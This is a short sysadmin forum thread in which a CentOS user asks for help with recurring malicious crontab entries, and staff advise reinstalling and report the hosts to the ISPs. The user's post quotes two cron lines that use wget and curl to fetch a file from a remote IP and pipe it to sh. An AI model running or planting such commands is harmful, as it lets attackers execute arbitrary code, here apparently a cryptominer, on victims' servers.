tasks Cron Infectado

Support for security such as Firewalls and securing linux
Post Reply
jrguzman23
Posts: 2
Joined: 2017/10/24 16:27:17

tasks Cron Infectado

Post by jrguzman23 » 2017/10/24 16:44:33

problems with crontab tasks.

good day.

I have problems with a centos server that cron tasks are restored and creates the following tasks.
* / 26 * * * * wget -O--q http://5.188.87.12/langs/logo.jpg|sh
* / 25 * * * * curl http://5.188.87.12/langs/logo.jpg|sh
I request your support, since I have not managed to disinfect the server. :?

User avatar
TrevorH
Site Admin
Posts: 33202
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: tasks Cron Infectado

Post by TrevorH » 2017/10/24 17:04:23

If that is root's crontab then you need to backup your data, reinstall the system and then restore (carefully inspecting the restored data for any signs of compromise). You cannot recover from a root compromise safely. You can never be 100% sure that you have found all backdoors into the server.

The code there appears to be a bitcoin miner.

You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.
The future appears to be RHEL or Debian. I think I'm going Debian.
Info for USB installs on http://wiki.centos.org/HowTos/InstallFromUSBkey
CentOS 5 and 6 are deadest, do not use them.
Use the FAQ Luke

User avatar
avij
Retired Moderator
Posts: 3046
Joined: 2010/12/01 19:25:52
Location: Helsinki, Finland
Contact:

Re: tasks Cron Infectado

Post by avij » 2017/10/24 17:16:43

For the record, I've also sent a note about this to the abuse email addresses of the two affected ISPs so that they would shut down those servers.

jrguzman23
Posts: 2
Joined: 2017/10/24 16:27:17

Re: tasks Cron Infectado

Post by jrguzman23 » 2017/10/24 18:43:38

thank you very much

Post Reply